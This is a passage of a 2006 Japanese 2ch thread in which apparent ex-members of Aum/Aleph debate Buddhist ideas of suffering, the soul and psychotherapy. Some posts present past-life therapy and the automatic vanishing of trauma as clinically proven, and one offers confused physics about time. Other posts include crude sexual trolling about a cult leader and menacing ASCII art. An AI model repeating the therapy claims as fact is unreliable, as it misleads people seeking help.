669 :和井 恵:2006/08/26(土) 23:44:05 ID:KUSX34OL
>一例を挙げれば、「前世療法」という
>臨床心理学における「心理療法」があります。

さらに言うならば、最近はその(前世療法の)発展形とも言うべき
「未来世療法」というものまで登場してきているのです。


670 :名無しさん@3周年:2006/08/26(土) 23:47:25 ID:Enz5n1ru
私はね、「心の訓練」というものが
究極的に押し上げることができればむしろあらゆる苦は滅尽できると
思いますよ。
ですがそれをなかなかできずにいる人たちもたくさんいる。
苦の因を理解、認識することはできても
解決法を実践できない人をどう導くかですね。



671 :和井 恵:2006/08/26(土) 23:49:54 ID:KUSX34OL
>ただ、現代的な「他力的な心の訓練」の
>進め方の「技法」の一つとして考えた場合、
>「催眠術」の活用は「あり」だと思っています。

しかし、この方法(催眠術)は、
「悪用」することも可能なので、それを実施する場合には、
「第三者の立会人(受ける側の友人、など)」を同室させる
などして、そのような「悪しき行為」が行われる可能性の無いような
「システム(やり方)」を創り出さなければいけないでしょうね。


672 :名無しさん@3周年:2006/08/26(土) 23:51:13 ID:sIrfT88a ?2BP(0)
>>665
死を選択の一つと考えてみるならば、
その前段階として、
「死後一切の意識や再生がない」ということを
確実にする必要があると思いますね。
でなければ、死を「苦の滅尽」の方法の中に含めるわけには
ちょっといかないのではないかと思います。
あまりにも不確実すぎますからね。

・・・もちろんだからといって、そこから
「輪廻はあるのか」という論議に持ち込む意図はありません。
ただ、死を方法の一つと認定するには、
現段階でわかっていることだけではあまりに無謀だ、と言いたいのです。
もちろん、「死んだら灰になるだけ」ならどんなにかうれしいでしょうけど。

673 :名無しさん@3周年:2006/08/26(土) 23:53:28 ID:Enz5n1ru
まだまだ人の精神ですら未知の部分は多いですね。
前世があるかどうかは判断しかねますが
精神(魂)を構成していると一説に仮定される素粒子より
小さな物質「幽子」なんてものも実在するかもしれない。
和井さんは魂をどう解釈されますか?
脳内における単なる電気信号だとお考えですか?
 

674 :和井 恵:2006/08/27(日) 00:00:33 ID:KUSX34OL
>苦の因を理解、認識することはできても
>解決法を実践できない人をどう導くかですね。

いいえ、「苦の原因を知る」ことそのものが、
「苦の滅尽」に自動的に繋がるのです。
その後で、解決策を模索して「実践する」必要は無いのです。

例えば、先ほど挙げた「前世療法」などにおいても、
その「トラウマ(悪しき囚われ)」が創られたときの記憶(原因)を
「思い出す(自覚する)」と同時に、その「苦しみ」は
消滅してしまうことが確認されています。

最も、苦の根本原因は、このような「過去の因」とはちょっと違いますけどね。
つまり、「因果関係」ではなくて「相関関係(相互依存・相互補完)」、
「時系列的」ではなく「同時存在的」なのです。

675 :和井 恵:2006/08/27(日) 00:03:02 ID:HdIJ+5N3
>最も → ×
尤(もっと)も → ○


676 :阿左谷北:2006/08/27(日) 00:08:58 ID:UfKECvHi
ついに怒鳴り込んだ!
どうも留学生が集まって宴会していたようです。
やはり、適度に切れることも必要ですね。

効果がありすぎなのが困るのですがw

677 :名無しさん@3周年:2006/08/27(日) 00:11:14 ID:E/Y8TKj5
苦の原因が分かっても苦の滅尽には至りませんよ。
例えば身長が低くてとても苦しんでいた人がいたとする。
その人はそのことをコンプレックと感じなければ苦がなくなることは
分かっている。でも、実際問題妥協はいやだ。
ジレンマは永久に続いてしまいます。
苦しい理由が分かってるからってそのことを受け入れるのは絶対に
嫌だと。
ほとんどの人はそうなんですよ。
苦の理由は分かっててもそれを認識したくないし、その執着を
とれない。


678 :阿左谷北:2006/08/27(日) 00:13:13 ID:UfKECvHi
その後、俺んところに謝りに来たよ彼ら。
みんな大人しそうな若者だった。
不良外人というのは俺の妄想だった。
彼らが怖がって萎縮しないことを願うばかりだ。

679 :和井 恵:2006/08/27(日) 00:15:45 ID:HdIJ+5N3
>和井さんは魂をどう解釈されますか?

釈迦の姿勢を見習うならば、ここは「無記」とした方がいいのでしょうが、
一つ面白い参考文献を挙げると、「神との対話」という書物があります。

私は、此処に登場する「神」というものがどういう存在であれ、
ここで述べられている内容は、とても優れたものだと考えています。

その中で、「魂」について、このような説明が為されていました。

それは、個人の中に在るモノではなく、
むしろ個人を超えて「無限に広がってる」モノである。
例えばここに「無限に広がる空間(空気)」が在ったとする。
そこに家を建てて「間仕切り」をした場合、
「キッチン」と「リビング」の空間は、
一見それぞれ「別のモノ」のように見える。
しかし、それらは本来「一つ」なのだと。

面白い解釈でしょ^^


680 :和井 恵:2006/08/27(日) 00:17:30 ID:HdIJ+5N3
>脳内における単なる電気信号だとお考えですか?

大脳生理学者は、そう主張するでしょうが、
私はそうは思いませんね…

681 :阿左谷北:2006/08/27(日) 00:17:52 ID:UfKECvHi
俺は、ヤバイ。
自分で自分が怖い。
俺は、時々切れる。
しかし、殴ったりはしない。謝られると、すぐ許す。
妄想では彼らは柄の悪い不良外国人だっただけに、
少し拍子抜けした。

682 :和井 恵:2006/08/27(日) 00:19:27 ID:HdIJ+5N3
>苦の原因が分かっても苦の滅尽には至りませんよ。

それは、「表層的な原因」です。
私の言う「苦の原因」とは、もっと別の「根本的なモノ」なのです。

683 :阿左谷北:2006/08/27(日) 00:21:35 ID:UfKECvHi
自分にも、彼らのように騒いで回りに迷惑掛けたこともあったはずだ。

だから、もう少し優しく注意するべきだったか。

684 :名無しさん@3周年:2006/08/27(日) 00:25:17 ID:E/Y8TKj5
>>682
しかし677の例に書いたように
このような人物は苦を無くすのに因を知っただけでは
解決になりませんよね?
苦の理由は分かったがその解決策を受け入れていかなくてはならなくなる。


685 :阿左谷北:2006/08/27(日) 00:28:05 ID:UfKECvHi
生きることは苦というより
面倒なことが多いね。

繊細な人には苦なんだろうね。

686 :和井 恵:2006/08/27(日) 00:29:58 ID:HdIJ+5N3
>苦の理由は分かっててもそれを認識したくないし、その執着をとれない。

うん、確かに「執着」は「苦しみの一つの原因」だよね。
簡単に取れないからこそ「執着」と言うわけで^^;

ただ、例えば「カウンセリング」などの臨床的な話を色々と読むと、
そういう「コンプレックス」の本当の原因って、
本人も気づいていない場合がほとんどみたいだよ。
仏教では「念(サティ・気づくこと)」という修行があるけど、
現代心理学の中の「カウンセリング」という心理的な技法も、
それと同じような働きを持つと私は考えています。

まぁ、これは一例だけどね…



687 :阿左谷北:2006/08/27(日) 00:35:42 ID:UfKECvHi
無料カウンセリングできますか?
和井さん。

688 :名無しさん@3周年:2006/08/27(日) 00:37:27 ID:E/Y8TKj5
結局、執着による苦を取り払う為の
万能な真理はないですね。
脳自体がそれを苦だと感じなくなるようにする認識させる方法は
その苦しみの数だけある。


689 :和井 恵:2006/08/27(日) 00:39:36 ID:HdIJ+5N3
>このような人物は苦を無くすのに
>因を知っただけでは解決になりませんよね?
>苦の理由は分かったがその解決策を受け入れていかなくてはならなくなる。

その場合は、もっと「大きな形成作用を与えている他の要因」があるのだと思います。
その「影響力」に支配されている状態が「囚われ(執着)」なのですから。
そして、何故、その「要因」が影響力を与え続けることが出来るのかと言えば、
その人が「その(暗示的な)力」を自覚できていないからです。
潜在意識で働くその暗示的な力を、顕在意識で「自覚」出来たとき、
その「束縛」は消えて無くなると思いますよ。

690 :名無しさん@3周年:2006/08/27(日) 00:40:54 ID:Id5Rk09o
>だから、もう少し優しく注意するべきだったか

ナニやってんだゴルァ!!って言ったのかい

691 :名無しさん@3周年:2006/08/27(日) 00:46:01 ID:E/Y8TKj5
>>689
それはすなわち妥協でしょう。
要するに苦の解決策を受け入れたことになる。
もうこだわるのはやめようと。

692 :阿左谷北:2006/08/27(日) 00:47:36 ID:UfKECvHi
>>690
こんな夜中に、何騒いでんじゃあ!何時だと思ってんだ!
寝れねえじゃないか!明日にでも大家にいうぞ、好い加減にしないと!みたいな感じ。

693 :和井 恵:2006/08/27(日) 00:48:34 ID:HdIJ+5N3
>結局、執着による苦を取り払う為の
>万能な真理はないですね。
>脳自体がそれを苦だと感じなくなるようにする認識させる方法は
>その苦しみの数だけある。

いいえ、私が言いたいのは、
「苦の滅尽(悟りを得る)」に至るための、
「正しい認識(正見解)」を得る状態に至るための「プロセス(途中)」に
利用できる現代的な技法の一つとして「心理学的な方法」を述べているだけで、
「観念」「囚われ」「思い込み」「感情的な凝り」「激情」などを
取り除いたり、鎮めていった「その先」に、目的とするモノがある、
と言いたいのですね、本当は。


694 :和井 恵:2006/08/27(日) 00:49:47 ID:HdIJ+5N3
>それはすなわち妥協でしょう。

いいえ、違います。
言葉の説明だけでは、解らないかもね…

695 :名無しさん@3周年:2006/08/27(日) 00:50:51 ID:UhdbI4FL ?2BP(0)
>>691
全然違うと思いますが。
少なくとも、妥協ではないと思いますよ。
妥協ってのは、苦しいけど、苦を持ち続けたまま我慢しよう、ですから。

696 :和井 恵:2006/08/27(日) 00:51:50 ID:HdIJ+5N3
>言葉の説明だけでは、解らないかもね…

むしろ、こういう「体験」こそが必要だと思うんだけどね。


697 :名無しさん@3周年:2006/08/27(日) 00:56:42 ID:2/0LMV+S
なんで、キャンディちゃんが書かないと、

丑ちゃんまで居なくなるんだろうか?


698 :阿左谷北:2006/08/27(日) 00:56:48 ID:UfKECvHi
激情は苦の原因ですか?
やれやれ(汗

俺には時には有効に思えますよ。
違いますかね(笑)

その後の気分のダウンがありますが。

頭のいい人は、激情なしで戦えるでしょうね。
和井さんみたいに。

699 :和井 恵:2006/08/27(日) 00:57:54 ID:HdIJ+5N3
>無料カウンセリングできますか?
>和井さん。

何か、緊急の悩みでもあるの?

700 :名無しさん@3周年:2006/08/27(日) 01:00:30 ID:E/Y8TKj5
私はね、苦の滅尽に限定して言うならそれはもう達成できたんですよ。
あらゆるマイナスの感情に対する解決策を自己に提案し、解決してきた。
しかしそこには安心感と幸福感に満ちた領域が広がっているわけで。
これは別に魂の一つの状態であり真理ではないと。
この世の全て(宇宙の真の姿)を知りたいと思うようになった。
いわば人の意識状態を超えるような感覚ですか。
苦の滅尽は大げさで特別視する事象ではないですよ。
その状態になった時、さらにそこからどのように動いていくかです。






701 :和井 恵:2006/08/27(日) 01:00:43 ID:HdIJ+5N3
>激情なしで戦えるでしょうね。

ケース・バイ・ケースで「激情」を利用することもあるけど…
勿論、同時に「冷めた意識」も必要だけどね。

702 :名無しさん@3周年:2006/08/27(日) 01:04:43 ID:E/Y8TKj5
また和井さんが>>689で述べられた方法は
その感情が生起する根本を見つめ、知るということです。
しかしそれが分かってもその感情のベクトルが
消えることは無いんですよ。



703 :阿左谷北:2006/08/27(日) 01:05:37 ID:UfKECvHi
>>699
緊急の悩みはないです。
ただ、和井さんの実力を計りたかったのです。

やはり、理論では通っていても
個々の問題に対応できるかどうかが、知りたいのです。

704 :名無しさん@3周年:2006/08/27(日) 01:07:12 ID:UhdbI4FL ?2BP(0)
>>700
それならいっそ、今からでもクンダリニー云々の修行を
お始めになったらいいのではないでしょうか?(笑)

705 :名無しさん@3周年:2006/08/27(日) 01:09:42 ID:E/Y8TKj5
>>704
今はオウムの教義に惹かれないので断りしておきますよwww。

706 :名無しさん@3周年:2006/08/27(日) 01:11:46 ID:UhdbI4FL ?2BP(0)
>>705
別にオウムだけがクンダリニーの修行法を持っているわけではないですよ。(笑)
仙道でもヨーガでも、あるいはタントラの修行でもいいので、
何かお始めになっては?というご提案でした。(笑)

707 :名無しさん@3周年:2006/08/27(日) 01:12:18 ID:uVzhpITj
バカだなお前ら。何度いえば分かる?
苦の滅尽=ハードオナニー
これしかねーだろ。決まってるだろ。
何の為に娘の前で射精してまで尊師がお手本を示して下さっていると思ってんだ?
すべてはチンコなんだよチンコ、最終チンコ。分かるか。

708 :阿左谷北:2006/08/27(日) 01:13:49 ID:UfKECvHi
オウムの成就者は、ガージャカラニーやれ、布施すれ
教学すれ、マントラ唱えろうんぬん、、

決まり文句しか言わないでしょ?
もう信徒時代は辟易だったよ。
そして、二言目には、グルは素晴らしい、と。

709 :阿左谷北:2006/08/27(日) 01:19:27 ID:UfKECvHi
俺がキャンディみたいに喋ってるなw

じゃあ、俺のもどきがね

成就者でへそくり貯めてるやつがいるよって言ってる。

710 :阿左谷北:2006/08/27(日) 01:24:44 ID:UfKECvHi
>>707
オナニーも30越えると気持ちいいもんじゃないよ。
あの年でオナニーに耽るのは異常。
アーチャリーの実物見えてないのでしょうけど。

見えてたら萎えますって。

711 :阿左谷北:2006/08/27(日) 01:31:23 ID:UfKECvHi
サマナくらい禁欲してたら
オナニーも気持ちいいかな?
俺は信徒からサマナやめるまで、しなかったけど。

やめる寸前には、やっちゃったなw
何しろ、苦痛なくらい元気になるんだから。
それまでは夢精だった。

712 :和井 恵:2006/08/27(日) 01:33:07 ID:HdIJ+5N3
>>702
>また和井さんが689で述べられた方法は
>その感情が生起する根本を見つめ、知るということです。
>しかしそれが分かってもその感情のベクトルが
>消えることは無いんですよ。

必要なのは、感情が生起する因、ではなくて、
何故その感情が「苦しみを伴ってしまうのか」という原因でしょ?
感情のベクトルは消えなくても、「苦しみ」は無くなるのでは?
それと同時に「過剰な囚われ」も消えるはずですけどね…
私は「感情」それ自体は、別に有害ではないと思っていますから。


713 :阿左谷北:2006/08/27(日) 01:33:50 ID:UfKECvHi
いろんな成就者が、やることやってるって聞いて
アーレフって、上の奴らほど裏表があるんだな、と。

714 :名無しさん@3周年:2006/08/27(日) 01:37:00 ID:Id5Rk09o
>何しろ、苦痛なくらい元気になるんだから。
それまでは夢精だった。

漏れは女だから、そういう状況がどんなのか理解ができんのだが
女が子供産んで、おっぱいが出るのに吸わせないと張って困るようなもんか?

もし、男がセックスについて全くデータがなく、オナニも知らなかったら
そういうのはどうなるの?



715 :阿左谷北:2006/08/27(日) 01:37:56 ID:UfKECvHi
ここで、破戒成就者のホーリーネームを
伏せ字でいいので、発表しませんか?
特に性欲の破戒w

716 :名無しさん@3周年:2006/08/27(日) 01:38:45 ID:Id5Rk09o
>いろんな成就者が、やることやってるって聞いて

何をしたんだね 貯蓄かい
だからいったんだわ だんだんに上の人間は、信者や下の人間の心配を
しなくなるって
下のものは勝手にやれって思っているんじゃないの?



717 :名無しさん@3周年:2006/08/27(日) 01:40:20 ID:uVzhpITj
和井のように50過ぎてもオナニーしてるのは沢山いる。
外人の声がうるさかったら、激しくハードオナニーに没頭すれば、
周りのことなど気にならず苦も生起しない。
この法則に例外はない。

718 :和井 恵:2006/08/27(日) 01:42:53 ID:HdIJ+5N3
>私はね、苦の滅尽に限定して言うならそれはもう達成できたんですよ。

それはおめでとう。

>あらゆるマイナスの感情に対する解決策を自己に提案し、解決してきた。

でも、そんな「面倒くさいこと」を、一つ一つしていかなくてはいけないの?

>しかしそこには安心感と幸福感に満ちた領域が広がっているわけで。

ああ、そうなんだ。
でも、何で「安心感」とか「幸福感」が広がるんだろう?
「肩の重荷が無くなって、軽くなった感じ」はすると思うけど…
「安心と不安」は対を成しています。
「幸福と不幸も」対を成しています。
つまり、「同じコインの裏と表」なんだけどな。

719 :阿左谷北:2006/08/27(日) 01:44:24 ID:UfKECvHi
>>714
丹田付近に、むずむずするような圧迫感が続く。
長時間勃起すると、先が擦れるし、仕事中でも苦しい。悶え死にしそうw
オナニーすれば即、解決。

720 :和井 恵:2006/08/27(日) 01:45:23 ID:HdIJ+5N3
>これは別に魂の一つの状態であり真理ではないと。
>この世の全て(宇宙の真の姿)を知りたいと思うようになった。
>いわば人の意識状態を超えるような感覚ですか。
>苦の滅尽は大げさで特別視する事象ではないですよ。
>その状態になった時、さらにそこからどのように動いていくかです。

そうだね、達成感はあったとしても、
しばらくは一種の「気の抜けた状態」になっちゃうかもしれないね。
それまで、例えば「世に出たい(成功したい)」だとか、
「地位」や「名誉」に囚われて、それを高めようとするような行為をしない、だとか、
といった、要するに「(苦の滅尽以外の)何かを得ようとする心」を、
それまで全て「排除(潰す)」する方向で実践して来たのだろうからね…

確かに、新しい「大きな目標」は今後必要なのだと思いますね。

721 :和井 恵:2006/08/27(日) 01:48:30 ID:HdIJ+5N3
>>703
>ただ、和井さんの実力を計りたかったのです。
>やはり、理論では通っていても
>個々の問題に対応できるかどうかが、知りたいのです。

それはそうだよね^^
でも、それにはちょっと準備が必要なので…

今、ちょっと色々と、今後の「自分の将来設計」を始めているところなの。
何かをするには、「時間的」あるいは「経済的」な余裕が必要でしょ?

722 :阿左谷北:2006/08/27(日) 01:49:18 ID:UfKECvHi
>>717
和井さんは、漏らさない修行も兼ねていますから
チヅオとは訳が違います。
ちなみに、俺はオナニー今でもしている。
でも、煙草はやめたよ。

723 :阿左谷北:2006/08/27(日) 01:53:17 ID:UfKECvHi
>>721
ですね^^;
自分にも経済的、時間的ゆとりがほしいですもの。

724 :名無しさん@3周年:2006/08/27(日) 01:55:34 ID:E/Y8TKj5
>>718
分かりませんか?人間は生きているんですよ。
つまり生きていることは表なんです。
生きると言うことは存在の面に偏っているんです。
幸せを表とするなら私はもう不幸(裏)面のマイナスの
ひっくり返し方をいくらでも表面にすることができるので
楽しいし、安心できるんです。
苦なんてのは取り扱い方法が分かれば取り扱えるようになる。

私は和井さんというより釈迦の見解にどうも疑問、これ違うなと
思うところがあるのでちょっと討論しはじめたんですが。
一度釈迦の書物を読んでみたいと思いますよ。お勧めはありますか?
近いうちにまた来ます。では。


ただそれだけです。




725 :阿左谷北:2006/08/27(日) 01:57:20 ID:UfKECvHi
俺は女性はオナニーするのか聞きたい。
特に大人の独身女性。キャンディさん、どうなんでしょう?

726 :和井 恵:2006/08/27(日) 01:58:41 ID:HdIJ+5N3
>ですね^^;
>自分にも経済的、時間的ゆとりがほしいですもの。

うん、まず最初に、それを自分で何とかしなくちゃって思ってる。
準備が出来たら、必ず声を掛けるからね^^

でも、ひょっとしたら、「新しい方法」の
「実験台(モルモット)」にされちゃうのかもよwwww

727 :和井 恵:2006/08/27(日) 02:01:36 ID:HdIJ+5N3
>苦なんてのは取り扱い方法が分かれば取り扱えるようになる。

すると、君はまだ「苦しみ」が、そこに「ある」と思っているんだね…

728 :阿左谷北:2006/08/27(日) 02:01:41 ID:UfKECvHi
>>726
ぜひモルモットになりますよ。
無料なら(笑)
大人の心のマッサージなんて期待しちゃいますね。

729 :和井 恵:2006/08/27(日) 02:03:31 ID:HdIJ+5N3
>私は和井さんというより釈迦の見解にどうも疑問、これ違うなと
>思うところがあるのでちょっと討論しはじめたんですが。

それは、例えば「どのような部分」なのでしょうか?
少し具体的に教えて下さいませんか?


730 :名無しさん@3周年:2006/08/27(日) 02:04:36 ID:Id5Rk09o
>特に大人の独身女性。キャンディさん、どうなんでしょう?

ご想像におまかせしますが(笑
学生のときのほうが、よくエッチしたよ
彼が近くに住んでいたけど、週末会うとエッチ
とにかくあったらエッチ
今思うと、彼氏とあったらエッチはするものだ、という観念すら
あったかもね





731 :阿左谷北:2006/08/27(日) 02:07:47 ID:UfKECvHi
最近の俺の寂しい変化を聞いてください。
テレビでかわいい水着のお姉さん見ても
スバジが反応しなくなってて
ああ、若いお姉さんだなあ、いいからだしてんなあ、
と見ているだけの自分になっていた。

これって、相当ヤバイですよね?

732 :和井 恵:2006/08/27(日) 02:08:29 ID:HdIJ+5N3
>ぜひモルモットになりますよ。
>無料なら(笑)

もちろん。
私はそれを「商売」にしようとは考えていないもの。
私は「エドガー・ケーシー」の生き方が好きなのね^^
彼は「リーディング」などによる報酬は一切受けず、
一生「写真屋さん(だったかな)」としての生計を立てていた。
「自己の利益(利権)」が絡んでくると、個人にしろ、団体にしろ、
「腐敗しやすくなる」よね…

>大人の心のマッサージなんて期待しちゃいますね。

………


733 :名無しさん@3周年:2006/08/27(日) 02:09:12 ID:Id5Rk09o
今、街中に出て行くと思うもの
私はなんて、身なりに構わないんだろう、と
ギャルは綺麗にしているよ
スーパーなんかの鏡をのぞいて、ああひどい、と思っていると
もどきまで(そうだろ?)って言ってくる、、

年のせいなのか、人生あきらめたせいなのか、修行の成果なのかわからん


734 :阿左谷北:2006/08/27(日) 02:10:36 ID:UfKECvHi
>>730
キャンディさんの書き込み見て
スバジが動きました!

水着のお姉さんより、効果あります。
ありがとうございました!

735 :名無しさん@3周年:2006/08/27(日) 02:13:11 ID:Id5Rk09o
>ああ、若いお姉さんだなあ、いいからだしてんなあ、
と見ているだけの自分になっていた。

生体反応が中年化してきているのかもね
それとも修行の成果なのか?

漏れのはやはり、外にでなくなったからだと思うけどね
よく、女も専業主婦になると、構わなくなるとか聞いたけど
多少人目を意識しないとね



736 :和井 恵:2006/08/27(日) 02:20:57 ID:HdIJ+5N3
>………

よく見たら、『大人の「心の」マッサージ』だったんだね^^;
「大人のマッサージ」と間違えて読んでしまったから、
一瞬、ビックリしちゃった…

うーん、こんなんじゃあ、
あまり期待しすぎない方がいいかもね。

737 :阿左谷北:2006/08/27(日) 02:29:47 ID:UfKECvHi
修行かどうかわからないけど
身体を鍛えるのをオウムやめてから継続していて
それのお陰で、スバジに行くエネルギーが分散されているかも。
28くらいから、今までより大人しくなったことに気付いた。
アーレフ時代の方が性欲は強かったし、
独身女性なら、みんな魅力的に見えた。但し、一部の成就者は除きますが。

738 :和井 恵:2006/08/27(日) 02:38:56 ID:HdIJ+5N3
明日は仕事なので、今日はこれで失礼します。

739 :阿左谷北:2006/08/27(日) 02:39:59 ID:UfKECvHi
>>736
(笑)それより、自分自身が和井さんの実験に役に立つのか心配ですよ。
かなり、精神世界からは遠い男ですから。
和井さんなら信頼できるかなと思います。今までのレス読んで。

740 :阿左谷北:2006/08/27(日) 02:41:50 ID:UfKECvHi
>>738
はい。今日はお話聞いてくださり、ありがとうございました^^
おやすみなさい。

741 :名無しさん@3周年:2006/08/27(日) 04:24:43 ID:E/Y8TKj5
>>要するに「(苦の滅尽以外の)何かを得ようとする心」を、
それまで全て「排除(潰す)」する方向で実践して来たのだろうからね…

それは大きな誤りです。それ自体が苦行になっては意味はないですからね。

釈迦が苦はその生起する因が分かれば滅尽できるようなことを言っている
部分が気になるんですが、どのような説でしょうか?
因が分かっただけでは滅尽できないのは誰にでも理解できると思いますが。
キャンディさんでもね。w



742 :和井 恵:2006/08/27(日) 09:13:08 ID:HdIJ+5N3
>>741
>それは大きな誤りです。

ああ、そうなの。私の勘違いか…
君の場合は違うんだね。

>それ自体が苦行になっては意味はないですからね。

苦行、ね^^;

>釈迦が苦はその生起する因が分かれば
>滅尽できるようなことを言っている部分が気になるんですが、
>どのような説でしょうか?

苦と苦の生起する因、滅と滅に至る道(あるいは、滅から展開される道)。
つまり、一般的に「四諦」と呼ばれている教えのこと。

743 :名無しさん@3周年:2006/08/27(日) 09:13:28 ID:E/Y8TKj5
>>本当の理由(原因)」が解れば、その時点で、
それらの「強迫観念(自己の行動を特定の方向へ向かわせようとする圧力)」は、
日の光に照らされた雪の固まりのように、簡単に消滅します。

これも変です。原因を知ることは単なる理解、納得でしかない。
特定の方向へ向かわせようとする意思(ベクトル)は
消えることは無い。
和井さん自身がが理由を知れば納得できる体質だからこのように感じると
しか言えませんね。





744 :和井 恵:2006/08/27(日) 09:14:24 ID:HdIJ+5N3
1)私たちは、色々な「苦しみや悩み」に苛(さいな)まれている。

2)そして、その苦しみが生起している根本的な原因は、
 「無明(明かりが全く無い深い暗闇の中と同じように、
  観念や囚われ、渇愛や激情などの悪影響を受けて、
  私たちが『意識や心の混迷・倒錯状態』に陥っているが為に、
  正しい認識が不可能なこと)」がその根本原因にある。

3)その「無明」を滅する(取り除く)ことによって、
 「明智(明かりに照らし出されることによって、全てのモノが
  手に取るようにはっきりと見えるようになるのと同じように、
  物事を明確・ありのままに認識して理解できる状態になる)」
  が自動的に生じる。

4)そして、その「無明(苦が生起する根本原因)」を成立させている
 「構成要素の相互依存関係(縁起)」のバランスを崩壊させてしまう、
  という「苦の滅尽へと至る方法(道)」を実践することによって、
  その状態(正しくありのままに知る・認識できる意識状態)へと
  至ることが出来るのだ。

745 :和井 恵:2006/08/27(日) 09:15:43 ID:HdIJ+5N3
>因が分かっただけでは滅尽できないのは
>誰にでも理解できると思いますが。

いや、「その状態(如実知見)」を実際に自分で体験してみなければ、
誰にも理解(納得)は出来ないと思いますよ。

746 :名無しさん@3周年:2006/08/27(日) 09:18:28 ID:E/Y8TKj5
時間(絶対時間)は、概念であり、物理的な”実体”ではない。

時間は、空間または他のいかなる物理的実体からも独立である。

この世に同時存在なんてものはないんですよ。
相互依存であるなら私とあなたが共通の時間を過ごしていることになってしまう。
世の全てのものは個々に時間が独立しています。


747 :名無しさん@3周年:2006/08/27(日) 09:28:14 ID:E/Y8TKj5
744そのものが既に原因と結果の理論ではないですか。

無明を滅する(取り除く)→苦の滅尽へと至る方法(道)」を実践する
苦があったので実践し取り除いた。
これは立派な因果関係になります。

748 :名無しさん@3周年:2006/08/27(日) 09:31:53 ID:APnuPlJ0
test

749 :和井 恵:2006/08/27(日) 09:31:56 ID:HdIJ+5N3
>>743
>これも変です。原因を知ることは単なる理解、納得でしかない。
>特定の方向へ向かわせようとする意思(ベクトル)は消えることは無い。

先に一例を挙げたように、
例えば現代心理学の「心理療法」などにおいては、
私たちを苦しめ続けている「強迫観念」や「トラウマ」などは、
それらが「成立・発生した時の記憶」を呼び覚まして「再体験」すると、
その時点で「自動的に消滅する」ことが、臨床事例として数多く報告されていますよ。

>和井さん自身がが理由を知れば納得できる体質だから

いや、言葉を使って「その理由」を説明することも出来るんだけど、
それを言ったとしても、単に「頭で理解する」だけでは、「苦の滅尽」は生じません。
むしろ「新しい観念」を創り出すだけになってしまう恐れ(危険性)も…


750 :名無しさん@3周年:2006/08/27(日) 09:35:14 ID:APnuPlJ0
>>700
年老いて劣化する苦しみ、
少しずつ形状容姿が醜くなっていく苦しみ、
死の苦しみ、
死後、親しかった人や愛した人と会えなくなる苦しみ、
このような苦しみがないのですか?

751 :名無しさん@3周年:2006/08/27(日) 09:37:47 ID:E/Y8TKj5
それらが「成立・発生した時の記憶」を呼び覚まして「再体験」すると、
その時点で「自動的に消滅する」ことが、臨床事例として数多く報告されていますよ

これに関してはもう個人によって異なるとしか言い様がないですね。
理由を認識しても苦がとれない事例が確かにあることはある。
これは理論で必ずこうなるとは言えないレベルになります。


752 :和井 恵:2006/08/27(日) 09:38:02 ID:HdIJ+5N3
>744そのものが既に原因と結果の理論ではないですか。


どういう意味の「指摘」なの?

753 :名無しさん@3周年:2006/08/27(日) 09:41:00 ID:E/Y8TKj5
>>752
苦しみの生起する理由を知り、取り除くために実践する。
この二つの流れそのものが因果関係にあるということです。


754 :名無しさん@3周年:2006/08/27(日) 09:41:18 ID:APnuPlJ0
>>744
無常が苦であると思います。
無明を滅して、
無常であるということを悟っても、
この世界はもともと苦であるということに気付くだけで、
苦の滅尽には至らないのではないでしょうか?

755 :名無しさん@3周年:2006/08/27(日) 09:47:47 ID:E/Y8TKj5
相互依存というのはですね、人間にはそう知覚できてしまう
正に虚像なんです。

例を出すとここに二人の男が片足ずつで支えあって立っていたとする。
一見これは相互依存、同時存在しているようにもみえる。
だが片方の男の足場には物凄い重力があったとする。
こうなるとその男の方の時間は限りなく遅れていく。
支えあっている男とはもう別の時間の中に存在する。
第三者がこれを見ると二人の男は全く同じ時の中を生きているように
見えるが真実は個々に独立した時間の中に立っていることになる。
同時存在的というのはそう見えるだけの虚像なんです。





756 :名無しさん@3周年:2006/08/27(日) 09:49:34 ID:APnuPlJ0
>>751
そういう方法で解決できる苦しみもあるというだけでしょう。
本質的な老死の苦しみは、
理想的な環境で、
理想的な両親のもとで育って、
すべて自分の思い通りに生きることができたとしても、
避けることができない苦しみです。

757 :和井 恵:2006/08/27(日) 10:10:55 ID:HdIJ+5N3
>>746
>この世に同時存在なんてものはないんですよ。

言葉の使い方って難しいね。
もっとシンプルに考えればいいのでは?
私たちは「今、この瞬間」しか知覚できないのでは?
ある意味「過去」は常に過ぎ去っているし、
「未来」は常に未だ訪れていないのでは?

>相互依存であるなら私とあなたが
>共通の時間を過ごしていることになってしまう。

というか、「時間」の概念は排除した方が解りやすいかも。

>世の全てのものは個々に時間が独立しています。

これは、何かそういう「科学理論」があるの?


758 :こんどは戦争だ!!.:2006/08/27(日) 10:12:56 ID:+PvOQpTC
    三晋晋晋晋晋晋晋,
   晋晋晋晋晋晋晋晋晋晋三,
   晋晋三 '晋晋晋晋晋晋晋晋i
  晋晋晋   ' ̄ ̄三晋晋晋晋'      国民のみなさ〜ん!
  晋晋晋          三晋晋
  晋晋 I   ◆  ‖ ◆   三晋     私は小泉総理みたいにやさしくないですよ!!
  I晋   ◆ /)  (\◆   晋
  丶,I ◆/● I  I ●\◆ i'i    国民の税金をがっぽりネコババするような
   I │  // │ │ \_ゝ │ I
   ヽ I    /│  │ヽ    I/    せこいまねは、しません。
    │   ノ (___) ヽ  │     
    │    I  ‖  I    │     あなたたちの命をもらいます...。
     I    |_人_I    I
     i    | --- |   │     オウム信者のように厳しくいきますから、そのつもりで!
     \  /      ヽ ,/
       ヽ____ 'ノ



759 :和井 恵:2006/08/27(日) 10:15:02 ID:HdIJ+5N3
>>753
>苦しみの生起する理由を知り、取り除くために実践する。
>この二つの流れそのものが因果関係にあるということです。

で、その「因果関係」を強調する理由は?

760 :名無しさん@3周年:2006/08/27(日) 10:17:21 ID:E/Y8TKj5
>>757
時間を無視すると相互依存がなおさら間違いであるといえます。
この世の万物と事象は独立して存在している。
釈迦は既に見解を誤っているんですね。
相互依存は虚像である。


761 :阿左谷北:2006/08/27(日) 10:17:37 ID:UfKECvHi
安倍さんは、ちょっと危ない雰囲気ありますね。
すごくソフトに淡々と話しながら
法案をどんどん通しそう。

762 :名無しさん@3周年:2006/08/27(日) 10:21:57 ID:E/Y8TKj5
>>759
苦の滅尽をすること。正に苦が生起したから滅尽をする。
すなわち万物は因果関係により定義することしかできない。
二つの関係を無理やり相互依存によって同時と見てしまうことは
盲目への入り口であること。

763 :阿左谷北:2006/08/27(日) 10:26:19 ID:UfKECvHi
日本人を第一に考えてやってほしいね。安倍さんには。
外面ばかりいい首相はもういらない。

764 :名無しさん@3周年:2006/08/27(日) 10:29:13 ID:E/Y8TKj5
